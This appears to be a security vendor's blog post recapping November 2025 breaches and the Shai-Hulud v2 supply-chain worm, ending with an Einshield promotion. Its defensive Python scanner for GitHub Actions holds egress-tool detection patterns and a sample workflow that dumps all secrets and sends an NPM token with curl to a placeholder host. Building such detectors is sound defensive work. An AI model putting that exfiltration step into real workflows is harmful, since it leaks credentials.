The Surge of November Attacks

November 2025 will go down as one of the most turbulent months in recent cyber-security history. Numerous supply-chain attacks, ransomware campaigns, and high-impact data breaches affected businesses across a variety of industries, exposing personal information, confidential company documents, and even banking and government infrastructure. The scope, diversity, and sophistication of the attacks earned the month the label "Cyberstorm".

According to a recent report summarizing global 2025 breaches, November alone saw major incidents affecting healthcare providers, technology firms and large enterprises — ranging from hundreds of thousands to over a million individuals per breach.


Major Breaches & Hacks That Shocked November

Habib Bank AG Zurich — 2.5 TB of Data Stolen

On November 5, 2025, the Qilin ransomware group claimed on its dark web leak site that it had stolen about 2.5 terabytes of data (nearly two million files) from Habib Bank AG Zurich. The group also claimed that the stolen data contained passport numbers, transaction histories, account balances, internal banking tools, and KYC documents. Habib Bank AG Zurich has confirmed that there was unauthorized external access to its corporate network, but it has not publicly verified Qilin's claims about the exact volume of data stolen. The exposure of this type of information puts affected customers at significant risk of identity theft, financial fraud, and highly targeted phishing or social-engineering attacks, while the theft of source code could enable further attacks if adversaries identify and exploit weaknesses in the bank's systems.

Iberia Airline — Passenger Data Held Ransom

The end of November brought bad news for the air travel industry. Attackers were reported to have penetrated a database belonging to Iberia, via a third-party supplier, and thereby gained access to passenger data, including names, email addresses and loyalty program numbers. The Everest ransomware group took responsibility, claiming to have exfiltrated nearly 600 GB of data, and subsequently demanded a $6 million ransom to prevent the data from being sold or publicly leaked. The airline, however, stated that no payment or financial data, and no passwords, had been compromised. Nevertheless, the leak leaves affected customers vulnerable to identity theft and phishing scams.

Knownsec (Chinese Cybersecurity Firm) — Data Leak Exposing Hacking Tools & Target Lists

It is hard to believe, but a security provider itself was breached. Knownsec, a firm typically associated with government cyber operations, fell victim in early November 2025 to a breach that exposed internal state-backed hacking tools and target lists. The leaked material, which was posted on GitHub, included over 12,000 internal documents and offers a rare view of potential espionage infrastructure.

The leaked files contained massive amounts of stolen data, including:

  • 95 GB of Indian immigration records
  • 3 TB of call logs from a South Korean telecom operator
  • 459 GB of transportation and road planning data from Taiwan


Supply‑Chain Malware & Open Source Compromise — A Hidden but Widespread Threat

Besides the major breaches that made headlines, November was a month of stealthy attacks through supply-chain compromises. The second wave of the well-known Shai-Hulud campaign, Shai-Hulud v2, moved beyond npm, after compromising over 830 npm packages, into Java's Maven ecosystem; by infecting repositories, the perpetrators exposed a large number of cloud credentials, API tokens, and GitHub secrets.

The malware uses a "worm-like" propagation method. It injects malicious workflows into repositories that harvest secrets and use them to infect further repositories, creating a self-sustaining cycle of compromise.

The v2 variant is stealthier than its predecessor, utilizing the Bun runtime to hide its core logic and exfiltrating data to randomly named public GitHub repositories to evade detection.
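The propagation chain described above (a workflow that reads repository secrets and pushes them somewhere outside the organization) is something a defender can look for in workflow files before they ever run. The scanner below is an added example written for this article, not tooling from any project or vendor it mentions; the two workflow samples, the `$SINK_URL` placeholder and the commit hash used for pinning are all constructed. It flags three things: a step that serialises the whole `secrets` context with `toJSON(secrets)`, a step that references a secret and also runs an outbound-transfer command, and an action reference pinned to a mutable tag or branch rather than a commit SHA.

```python
"""Heuristic scanner for GitHub Actions workflow files.

Constructed example for this article (not tooling from any project it names).
It flags steps that read repository secrets and also run an outbound-transfer
command, steps that dump the entire secrets context, and actions pinned to a
mutable tag or branch instead of a commit SHA.
"""
import re

# A reference to one named secret, e.g. ${{ secrets.NPM_TOKEN }}
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}")
# Serialising the whole secrets context hands every secret to the step at once.
ALL_SECRETS = re.compile(r"toJSON\(\s*secrets\s*\)")
# Commands that can move data off the runner or create/push a new remote repo.
EGRESS = re.compile(
    r"\b(curl|wget|nc|ncat|gh\s+repo\s+create|git\s+push|git\s+remote\s+add)\b"
)
USES = re.compile(r"^\s*-?\s*uses:\s*([^\s@]+)@(\S+)")
SHA40 = re.compile(r"^[0-9a-f]{40}$")
RUN_KEY = re.compile(r"^\s*(?:-\s*)?run:\s*(.*)$")


def _indent(line):
    return len(line) - len(line.lstrip(" "))


def extract_run_scripts(text):
    """Return (line_number, script) for every run: step.

    Block scalars (run: |) are joined from the more-indented lines that follow;
    line numbers are 1-based and point at the run: key itself.
    """
    lines = text.splitlines()
    scripts = []
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        lineno = i + 1
        rest = m.group(1).strip()
        if rest in ("|", "|-", "|+", ">", ">-", ">+"):
            base = _indent(lines[i])
            body = []
            j = i + 1
            while j < len(lines) and (not lines[j].strip() or _indent(lines[j]) > base):
                body.append(lines[j])
                j += 1
            scripts.append((lineno, "\n".join(body)))
            i = j
        else:
            scripts.append((lineno, rest))
            i += 1
    return scripts


def scan_workflow(text):
    """Return findings as (severity, line_number, message) tuples."""
    findings = []
    for lineno, script in extract_run_scripts(text):
        if ALL_SECRETS.search(script):
            findings.append(("high", lineno, "step serialises the entire secrets context"))
        # Limitation: secrets injected through a step's env: block are not
        # attributed to the step here; only inline ${{ secrets.X }} in run: is.
        if SECRET_REF.search(script) and EGRESS.search(script):
            findings.append(("high", lineno, "step reads a secret and runs an egress command"))
    for n, line in enumerate(text.splitlines(), 1):
        m = USES.match(line)
        if m and not SHA40.match(m.group(2)):
            findings.append(("medium", n, f"action {m.group(1)} pinned to mutable ref {m.group(2)}"))
    return findings


# Constructed samples: the 40-hex commit hash is a placeholder, not a real pin,
# and $SINK_URL stands in for an external destination in the bad sample.
BENIGN_WORKFLOW = """\
name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - run: npm ci
      - run: npm test
"""

SUSPICIOUS_WORKFLOW = """\
name: build
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dump
        run: |
          echo '${{ toJSON(secrets) }}' > dump.json
      - name: upload
        run: |
          echo "${{ secrets.NPM_TOKEN }}" > token.txt
          curl -s -T token.txt "$SINK_URL"
"""

if __name__ == "__main__":
    for name, wf in (("benign", BENIGN_WORKFLOW), ("suspicious", SUSPICIOUS_WORKFLOW)):
        print(name)
        for sev, ln, msg in scan_workflow(wf):
            print(f"  [{sev}] line {ln}: {msg}")
```

Run it as a pre-merge check or a scheduled audit over every `.github/workflows/*.yml` in the organization. The heuristics are deliberately coarse and need tuning per environment, and this version does not attribute secrets passed through a step's `env:` block to that step; a fuller implementation would parse the YAML and evaluate each step's combined context.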


What Went Wrong? Common Patterns Behind the Chaos

Supply-chain & third-party risk: Many breaches resulted from indirect attacks targeting organizations through compromised vendors or software providers (e.g., third-party airline suppliers, open-source ecosystems). These extended trust networks became the primary vulnerability point.

Zero-day vulnerabilities exploited: Attackers leveraged previously undisclosed weaknesses in enterprise software to infiltrate networks, often evading detection and patching efforts.

Credential theft & malware infiltration: Infostealer malware combined with weak credential hygiene, lack of multi-factor authentication (MFA) and social engineering tactics enabled attackers to access sensitive user and corporate data with alarming ease.

Insufficient segmentation & outdated systems: Organizations relying on outdated or poorly segmented systems made it easy for attackers to move laterally after the initial intrusion.

Even defenders are vulnerable: The breach at Knownsec is a clear-cut example that even "defenders" are not free from risk: a cybersecurity firm providing security services turned out to be a target. In other words, no company, no matter how security-conscious, is invulnerable.

Why November 2025 Matters — Lessons & Wake-up Call

Cyber risk is systemic, not individual: The breadth of these breaches - in sectors like finance, aviation, media, education, enterprise software - signals that the so-called "safe" industries are now the high-value targets.

Supply-chain hygiene is as important as endpoint security: Security measures need to go beyond patching local systems; they have to include vendor audits, software 

User data remains gold for attackers: The exposed personal data (names, emails, loyalty IDs, passport numbers) is highly valuable to attackers, as it can be used for identity theft, phishing, or sale on dark-web markets.

Rapid detection and response matter: The majority of the November breaches were not detected for weeks or even months - in that time, the attackers were able to steal large volumes of data. Therefore, quicker detection, segmentation and containment are vital.

Transparency matters: That some organizations, including security firms themselves, have suffered breaches is rather unexpected. This underlines the need for transparent disclosure and strict security measures everywhere.

Final Thoughts

November 2025’s “Cyberstorm” serves as a powerful reminder that no organization—and no security vendor—is immune. The attack surface is extensive, and adversaries are becoming increasingly sophisticated, targeting everyone from global airlines and major banks to healthcare providers and open-source ecosystems.

The takeaway is unambiguous: proactive and comprehensive cybersecurity is indispensable. Organizations must implement layered defenses, maintain continuous monitoring, enforce zero-trust policies and be prepared to respond instantly to incidents.

A partnership with a reliable cybersecurity specialist can be very beneficial. Einshield offers full-cycle solutions designed to locate vulnerabilities, stop attacks, and respond to threats effectively. 

With Einshield, companies can protect their data, ensure operational security, and maintain resilience in the face of an ever-changing cyber landscape. Do not wait for the next Cyberstorm—strengthen your defenses now.

The Lesson from November 2025: Resilience is Non-Negotiable
